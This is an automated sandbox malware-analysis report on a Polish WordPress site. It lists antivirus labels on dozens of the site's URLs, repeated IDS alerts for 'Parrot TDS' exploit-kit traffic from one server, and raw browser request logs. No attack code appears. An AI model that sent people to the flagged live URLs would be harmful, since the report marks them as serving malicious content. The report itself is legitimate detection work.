Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://canpol.poznan.pl

Overview

General Information

Sample URL:http://canpol.poznan.pl
Analysis ID:1591722
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Detected non-DNS traffic on DNS port
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 2792 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6832 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1968,i,9372517278438592400,14477646121863632151,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://canpol.poznan.pl" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-15T11:07:57.764335+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649731TCP
2025-01-15T11:07:58.819807+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649738TCP
2025-01-15T11:08:00.759452+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649761TCP
2025-01-15T11:08:01.729567+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649774TCP
2025-01-15T11:08:01.773059+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649771TCP
2025-01-15T11:08:01.791142+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649773TCP
2025-01-15T11:08:01.801682+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649775TCP
2025-01-15T11:08:01.945321+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649776TCP
2025-01-15T11:08:02.585374+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649781TCP
2025-01-15T11:08:02.754112+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649780TCP
2025-01-15T11:08:02.760450+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649785TCP
2025-01-15T11:08:02.828273+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649784TCP
2025-01-15T11:08:02.857389+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649786TCP
2025-01-15T11:08:02.859989+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649787TCP
2025-01-15T11:08:02.928978+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649783TCP
2025-01-15T11:08:02.965553+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649789TCP
2025-01-15T11:08:03.254287+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649790TCP
2025-01-15T11:08:03.537619+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649793TCP
2025-01-15T11:08:03.697399+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649794TCP
2025-01-15T11:08:03.781059+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649797TCP
2025-01-15T11:08:03.898937+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649795TCP
2025-01-15T11:08:03.924212+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649799TCP
2025-01-15T11:08:03.957629+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649800TCP
2025-01-15T11:08:04.110480+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649801TCP
2025-01-15T11:08:04.642097+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649805TCP
2025-01-15T11:08:05.166198+010028540661A Network Trojan was detected178.63.214.90443192.168.2.1649813TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://canpol.poznan.pl/wp-content/themes/salient/css/responsive.css?ver=7.6Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2015/07/StarWars.pngAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2017/09/p-70200s-787x500.jpgAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/plugins/wp-ultimate-gallery/assets/css/wug-gallery.css?ver=5.8Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/themes/salient/js/vivus.min.js?ver=6.0.1Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/themes/salient/js/touchswipe.min.js?ver=1.0Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2015/12/gift-1167274_1920-1000x1000.jpgAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/plugins/js_composer_salient/assets/css/js_composer.min.css?ver=4.12.1Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_minnie.pngAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2018/10/disneyszyte.jpgAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/themes/salient/css/fonts/icomoon.woffAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2015/07/auchan_glowna_thumb.pngAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/plugins/wp-ultimate-gallery/libs/infinite-scroll/imagesloaded.pkgd.min.js?ver=20120206Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_zootropolis.pngAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2018/10/rozne.jpgAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2016/08/canpol_ico.pngAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2017/09/p-70200-984x500.jpgAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2018/10/klejone.jpgAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/plugins/fancy-box/jquery.fancybox.css?ver=1.2.6Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/themes/salient/img/transparent.pngAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/themes/salient/css/rgs.css?ver=6.0.1Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2015/07/zabka_glowna_thumb.pngAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/themes/salient/css/portfolio.css?ver=7.6Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/themes/salient/css/fonts/fontawesome-webfont.woff?v=4.2Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2015/07/tesco_glowna_thumb.pngAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_mickey_mouse.pngAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/themes/salient/css/ascend.css?ver=7.6Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2018/01/mickey_cr.jpgAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/themes/salient/js/isotope.min.js?ver=7.6Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2015/07/stokrotka_glowna_thumb.pngAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/themes/salient/js/init.js?ver=7.6Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_fairs.pngAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/plugins/wp-ultimate-gallery/libs/infinite-scroll/jquery.infinitescroll.min.js?ver=20120206Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2016/08/gift-553158_1920.jpgAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_captain_jackie.pngAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_miles_from_tomorrow.pngAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/themes/salient/js/magnific.js?ver=7.0.1Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/plugins/js_composer_salient/assets/js/dist/js_composer_front.min.js?ver=4.12.1Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/themes/salient/js/caroufredsel.min.js?ver=7.0.1Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/themes/salient/style.css?ver=7.6Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2017/09/PD-70200.jpgAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2015/07/makro_glowna_thumb.pngAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/themes/salient/css/font-awesome.min.css?ver=4.6.3Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/plugins/fancy-box/jquery.easing.js?ver=1.3Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2017/03/Disney.pngAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/plugins/wp-ultimate-gallery/libs/light-slider/lightslider.min.js?ver=20120206Avira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2018/10/disneyklejone-500x500.jpgAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/themes/salient/img/no-portfolio-item-tiny.jpgAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2018/10/zgrzewane.jpgAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/uploads/2018/10/disneyzgrzewane-500x500.jpgAvira URL Cloud: Label: malware
Source: https://canpol.poznan.pl/wp-content/themes/salient/css/magnific.css?ver=6.2Avira URL Cloud: Label: malware

Networking

barindex
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49738
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49731
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49781
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49774
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49787
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49784
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49773
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49761
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49783
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49797
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49793
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49786
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49775
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49771
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49785
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49805
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49799
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49794
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49790
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49800
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49776
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49801
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49795
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49789
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49780
Source: Network trafficSuricata IDS: 2854066 - Severity 1 - ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check : 178.63.214.90:443 -> 192.168.2.16:49813
Source: global trafficTCP traffic: 192.168.2.16:49177 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /en/ HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/css/dist/block-library/style.min.css?ver=5.8 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.4.2 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/fancy-box/jquery.fancybox.css?ver=1.2.6 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wp-ultimate-gallery/assets/css/wug-gallery.css?ver=5.8 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wp-ultimate-gallery/libs/light-slider/lightslider.min.css?ver=5.8 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/rgs.css?ver=6.0.1 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/font-awesome.min.css?ver=4.6.3 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/style.css?ver=7.6 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/magnific.css?ver=6.2 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/responsive.css?ver=7.6 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/portfolio.css?ver=7.6 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/ascend.css?ver=7.6 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/js_composer_salient/assets/css/js_composer.min.css?ver=4.12.1 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.0 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
